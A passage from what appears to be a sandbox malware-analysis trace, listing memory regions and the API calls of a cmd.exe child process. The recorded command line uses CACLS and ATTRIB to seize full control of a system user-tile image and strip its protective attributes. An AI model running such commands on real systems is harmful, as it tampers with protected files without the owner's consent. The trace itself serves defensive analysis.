start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28189 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28190 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28191 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28192 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28193 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28194 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28195 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28196 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 28197 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28198 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 621 os_tid = 0xac0 Process: id = "432" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28200 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28201 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28202 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28203 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 28204 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28205 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28206 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28207 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28208 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 28209 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28210 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28211 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28212 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28213 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 28214 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 28215 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28216 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28217 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28218 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28219 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28220 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28221 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28222 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28223 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28224 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 28225 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28226 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28227 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28228 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 28229 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 28230 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 28231 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 28232 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 28233 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 28234 start_va = 0x1270000 end_va = 0x153efff entry_point = 0x1270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 622 os_tid = 0xad8 [0191.996] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfac4 | out: lpSystemTimeAsFileTime=0x2cfac4*(dwLowDateTime=0xa756a880, dwHighDateTime=0x1d440a9)) [0191.996] GetCurrentProcessId () returned 0xa90 [0191.996] GetCurrentThreadId () returned 0xad8 [0191.996] GetTickCount () returned 0x369e9 [0191.996] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfabc | out: lpPerformanceCount=0x2cfabc*=24878520292) returned 1 [0191.997] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0191.997] __set_app_type (_Type=0x1) [0191.997] __p__fmode () returned 0x76b331f4 [0191.997] __p__commode () returned 0x76b331fc [0191.997] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0191.997] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0191.997] GetCurrentThreadId () returned 0xad8 [0191.997] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xad8) returned 0x38 [0191.997] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.997] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0191.997] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.997] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0191.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa54 | out: phkResult=0x2cfa54*=0x0) returned 0x2 [0191.997] VirtualQuery (in: lpAddress=0x2cfa8b, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.997] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0191.997] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0191.997] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.998] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa24, dwLength=0x1c | out: lpBuffer=0x2cfa24*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0191.998] GetConsoleOutputCP () returned 0x1b5 [0191.998] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.998] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0191.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0191.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.998] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.999] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.999] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0191.999] GetEnvironmentStringsW () returned 0xe0308* [0191.999] FreeEnvironmentStringsW (penv=0xe0308) returned 1 [0191.999] GetEnvironmentStringsW () returned 0xe0308* [0191.999] FreeEnvironmentStringsW (penv=0xe0308) returned 1 [0191.999] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9c4 | out: phkResult=0x2ce9c4*=0x40) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0xb8, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x1, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x1, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x0, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x40, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x40, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0191.999] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x40, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0192.000] RegCloseKey (hKey=0x40) returned 0x0 [0192.000] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9c4 | out: phkResult=0x2ce9c4*=0x40) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x40, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x1, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x1, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x0, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x9, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x4, lpData=0x2ce9d0*=0x9, lpcbData=0x2ce9c8*=0x4) returned 0x0 [0192.000] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9cc, lpData=0x2ce9d0, lpcbData=0x2ce9c8*=0x1000 | out: lpType=0x2ce9cc*=0x0, lpData=0x2ce9d0*=0x9, lpcbData=0x2ce9c8*=0x1000) returned 0x2 [0192.000] RegCloseKey (hKey=0x40) returned 0x0 [0192.000] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639a [0192.000] srand (_Seed=0x5b88639a) [0192.000] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"" [0192.000] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp\"" [0192.000] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.000] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0192.001] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.001] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.001] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.001] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0192.001] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0192.001] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0192.001] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0192.001] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0192.001] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0192.001] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0192.001] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0192.001] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0192.001] GetEnvironmentStringsW () returned 0xe2458* [0192.001] FreeEnvironmentStringsW (penv=0xe2458) returned 1 [0192.001] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.001] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.001] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0192.001] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0192.001] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0192.001] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0192.001] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0192.001] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0192.001] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0192.001] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0192.001] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf790, lpFilePart=0x2cf78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf78c*="Desktop") returned 0x18 [0192.001] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.002] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf50c | out: lpFindFileData=0x2cf50c) returned 0xe0ae8 [0192.002] FindClose (in: hFindFile=0xe0ae8 | out: hFindFile=0xe0ae8) returned 1 [0192.002] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf50c | out: lpFindFileData=0x2cf50c) returned 0xe0ae8 [0192.002] FindClose (in: hFindFile=0xe0ae8 | out: hFindFile=0xe0ae8) returned 1 [0192.002] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf50c | out: lpFindFileData=0x2cf50c) returned 0xe0ae8 [0192.002] FindClose (in: hFindFile=0xe0ae8 | out: hFindFile=0xe0ae8) returned 1 [0192.002] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.002] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0192.002] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0192.002] GetEnvironmentStringsW () returned 0xe0308* [0192.002] FreeEnvironmentStringsW (penv=0xe0308) returned 1 [0192.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.003] GetConsoleOutputCP () returned 0x1b5 [0192.003] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.003] GetUserDefaultLCID () returned 0x409 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf8d0, cchData=128 | out: lpLCData="0") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8d0, cchData=128 | out: lpLCData="0") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8d0, cchData=128 | out: lpLCData="1") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0192.003] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0192.004] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0192.004] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0192.005] GetConsoleTitleW (in: lpConsoleTitle=0xd09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.005] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.005] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0192.005] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0192.005] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0192.006] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0192.006] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0192.006] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0192.006] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0192.006] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0192.006] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0192.006] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0192.006] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0192.009] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0192.009] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0192.009] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0192.009] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0192.009] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0192.009] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0192.009] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0192.011] GetConsoleTitleW (in: lpConsoleTitle=0x2cf564, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 